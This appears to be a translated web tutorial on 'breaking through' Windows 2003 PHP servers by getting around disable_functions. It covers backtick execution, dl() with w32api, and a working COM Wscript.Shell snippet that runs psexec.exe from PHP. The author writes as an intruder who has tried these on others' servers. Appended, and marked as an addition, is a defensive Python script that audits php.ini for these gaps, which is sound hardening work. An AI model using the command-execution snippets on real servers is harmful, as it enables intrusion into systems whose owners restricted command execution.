New ideas for breaking through a Windows 2003 PHP server

Source: Internet
Author: User
From Windows 2000 to Windows XP to Windows 2003, the increase in server security for MS IIS is obvious. On Windows 2000, an ordinary PHP shell could crush it. On Windows XP, even with safe_mode = off, you cannot execute system commands with functions such as system(), but the COM() function can still be used to break through. On Windows 2003, even with IIS and PHP in their default installation, system() and COM() may not be enough to take it. At this point you have to use some new methods to break through.

1. Breaking through disable_functions

In PHP versions 4.0.1 and above, php.ini introduced the disable_functions directive. It is useful: you can use it to prohibit certain functions. For example, add disable_functions = passthru exec system popen to php.ini; executing any of these functions then produces the message "Warning: system() has been disabled for security reasons" and the program stops running. But that does not mean there is no way to execute a system command, because PHP borrows many Perl features, such as the ability to execute commands with backticks (`). The sample code is as follows:

   <?php $output = `...`;   // the command inside the backticks is missing from this page
   echo "$output"; ?>

It is said that this can only be avoided by setting safe_mode to on, but the last time I used it on a foreign server it failed; people are not always so lucky.

2. Application of the dl() function

When none of PHP's internal command execution functions is available, try dl(). It can only be used with safe_mode = off, because it is disabled in safe mode. With dl() you can call W32API functions directly, but this extension has been moved to the PECL library and is no longer bundled as of PHP 5.1.0. Here is an example from the manual:

   <?php
   // Load the extension
   dl("php_w32api.dll");

   // Register the GetTickCount function from kernel32.dll
   w32api_register_function("kernel32.dll",
                            "GetTickCount",
                            "long");

   // Register the MessageBoxA function from User32.dll
   w32api_register_function("User32.dll",
                            "MessageBoxA",
                            "long");

   // Get uptime information
   $ticks = GetTickCount();

   // Convert it to easy-to-understand text
   $secs  = floor($ticks / 1000);
   $mins  = floor($secs / 60);
   $hours = floor($mins / 60);

   $str = sprintf("You have been using your computer for: " .
                  "%d Milliseconds, or %d Seconds " .
                  "or %d mins or %d hours %d mins.",
                  $ticks,
                  $secs,
                  $mins,
                  $hours,
                  $mins - ($hours * 60));

   // Display a message box with only an OK button and the uptime text above
   MessageBoxA(NULL,
               $str,
               "Uptime Information",
               MB_OK);
   ?>

Unfortunately, I have not understood dl() and W32API, so I will not give an example, lest I mislead the reader.

3. Application of COM and .NET (Windows) functions

COM (Component Object Model) is a software specification developed by Microsoft for building object-oriented, compiled software components. It allows software to be abstracted as binary components and is used primarily on Windows platforms.

The Windows version of PHP has built-in support for this extension, so you can use COM functions without loading any additional extension libraries. Its usage resembles the syntax for creating class instances in C++ or Java: the COM class name is passed to the constructor. For example, use the "Wscript.Shell" object in PHP to execute system commands:

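   <?php
   $cmd = "E:/cert/admin/psexec.exe";

   // Create the Wscript.Shell COM object
   if ($com = new COM("Wscript.Shell")) echo "Yes";

   // Run the command through the shell object
   if (!$cmd1 = $com->exec($cmd))
   {
       echo "Can not exec()";
   }

   // Get the output stream of the started process
   if (!$cmd2 = $cmd1->stdout())
   {
       echo "Can not stdout()";
   }

   // Read everything the process wrote
   if (!$cmd3 = $cmd2->readall())
   {
       echo "Can not ReadAll()";
   }

   echo $cmd3;
   ?>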
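
A defensive check for the three techniques covered above, as an added example that is not part of the original article: it audits a php.ini body for the gap each technique relies on (backticks are governed by shell_exec, dl() by enable_dl, and the COM class here by disable_classes). The sample php.ini is constructed, the names parse_ini, name_list and audit are hypothetical, and using disable_classes as the COM control is an assumption.

```python
import re

# Constructed php.ini sample (not from the page); it mirrors the article's
# space-separated disable_functions line.
SAMPLE_INI = """\
[PHP]
; constructed example
disable_functions = passthru exec system popen
enable_dl = On
"""

# Built-ins that start a program; the backtick operator is identical to shell_exec().
EXEC_FUNCS = {"system", "exec", "passthru", "popen", "proc_open", "shell_exec"}

def parse_ini(text):
    """Return {directive: value} for a php.ini body; the last assignment wins."""
    settings = {}
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()      # drop ; comments
        if "=" in line and not line.startswith("["):
            key, value = line.split("=", 1)
            settings[key.strip().lower()] = value.strip().strip('"')
    return settings

def name_list(value):
    """PHP splits these lists on commas and spaces alike; names are case-insensitive."""
    return {n.lower() for n in re.split(r"[,\s]+", value) if n}

def audit(text):
    """List the gaps that leave the article's three techniques open."""
    ini = parse_ini(text)
    disabled = name_list(ini.get("disable_functions", ""))
    classes = name_list(ini.get("disable_classes", ""))
    findings = []
    for func in sorted(EXEC_FUNCS - disabled):
        note = " (backtick operator stays usable)" if func == "shell_exec" else ""
        findings.append(f"disable_functions is missing {func}{note}")
    # enable_dl defaults to on; dl() can also be blocked through disable_functions
    dl_on = ini.get("enable_dl", "1").lower() in {"1", "on", "yes", "true"}
    if dl_on and "dl" not in disabled:
        findings.append("dl() can load extensions: set enable_dl = Off")
    # Assumption: the COM class is blocked by listing it in disable_classes
    if "com" not in classes:
        findings.append("COM class is not listed in disable_classes")
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_INI):
        print("-", finding)
```

Run against the article's own disable_functions line, the audit reports shell_exec and proc_open as missing, which is why the backtick example still works on such a server.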
